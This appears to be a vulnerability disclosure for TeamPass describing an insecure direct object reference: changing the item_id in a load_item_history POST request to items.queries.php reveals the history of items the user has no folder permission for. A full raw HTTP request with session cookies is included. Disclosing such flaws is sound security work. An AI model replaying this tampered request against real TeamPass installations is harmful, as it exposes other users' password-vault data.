Description

By editing the ID on the request or HTML I can see some information of any item via ID

Proof of Concept

1. Create two account with perrmission on two folder and set permission for each user.
   

2. Create item with each user
   

3. View detail a item and change item_id on request view history

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 87
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 98306e16032402cd5ea3b7d8dd796e0630482672fbc73f91e2=9f1f0a5f7b487eea4da2d4c490ebe41ee75827a8f9da5b0c97; eid=2; download_started=0; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; plupload_ui_view=thumbs; teampass_session=1c25dokujscfq8aj1qvp84a3ue; jstree_select=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=load_item_history&item_id=2&key=tMV9Z62V8X2VqVPz33sFP8mUEF7psK295Fhcy5JHEnkvvuMUyC

history for the item viewed from the permission of someone who have permission to the folder but this item

history for the item viewed from the permission of someone who does not have permission to the folder but this item